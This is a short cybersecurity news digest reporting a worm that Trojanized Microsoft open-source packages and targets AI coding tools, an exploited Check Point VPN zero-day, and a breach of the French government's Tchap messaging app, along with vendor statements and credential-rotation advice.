Top stories.
- Shai-Hulud variant compromises dozens of open-source Microsoft packages.
- Check Point patches actively exploited VPN zero-day.
- Hacker breaches the French government's encrypted messaging app.
Shai-Hulud variant compromises dozens of open-source Microsoft packages.
At least 73 signed open-source packages from Microsoft were Trojanized with credential-stealing code last week, Ars Technica reports. The malware, dubbed "Miasma," is a variant of TeamPCP's Mini Shai-Hulud worm, which was open-sourced last month. According to researchers at Cloudsmith, the malware is designed to execute automatically when an infected repository is cloned and opened within an AI coding tool—specifically, Claude Code, Gemini CLI, VS Code, and Cursor.
GitHub has since flagged the infected packages and blocked them from the platform. Microsoft acknowledged the incident yesterday, stating, "We have temporarily removed some repositories as we investigate potential malicious content."
OpenSourceMalware has published a list of the impacted packages. Developers who used these packages should assume they were compromised. Cloudsmith says affected organizations should revoke and rotate GitHub Personal Access Tokens (PATs) & SSH keys, CI/CD signing keys & environment secrets, and Azure & GCP cloud credentials.
Check Point patches actively exploited VPN zero-day.
Check Point yesterday issued patches for an actively exploited zero-day affecting Check Point Remote Access VPN and Mobile Access deployments that were set to use the deprecated IKEv1 key exchange protocol. The vulnerability (CVE-2026-50751) has been used in attacks targeting several dozen organizations around the world, with at least one of the attacks attributed to a Qilin ransomware affiliate.
Check Point stated, "By exploiting a logic flaw in certificate validation, an attacker can establish a VPN session without possession of a valid password, effectively bypassing authentication requirements. Additional post-authentication activity is required to access internal resources or escalate privileges."
Hacker breaches the French government's encrypted messaging app.
France's digital affairs directorate (DINUM) has warned that a threat actor breached Tchap, the French government's encrypted messaging platform developed by DINUM and France's cybersecurity agency ANSSI, BleepingComputer reports. DINUM stated, "Tchap allows for both public and private conversations. Private conversations are encrypted, and their content is protected. Even in the event of account hijacking, the history of private and encrypted conversations is not accessible. Therefore, any exchanges that may have been viewed are limited to the content of public conversations. Of the more than 825,000 registered agents, 73,467 are reportedly affected by this incident, representing less than 9% of registered users. These forums, by design, are open to all users, and their messages are not encrypted. Agents' private conversations remain protected."
BleepingComputer notes that a threat actor took responsibility for the breach on an underground forum, claiming to have stolen more than 640,000 messages.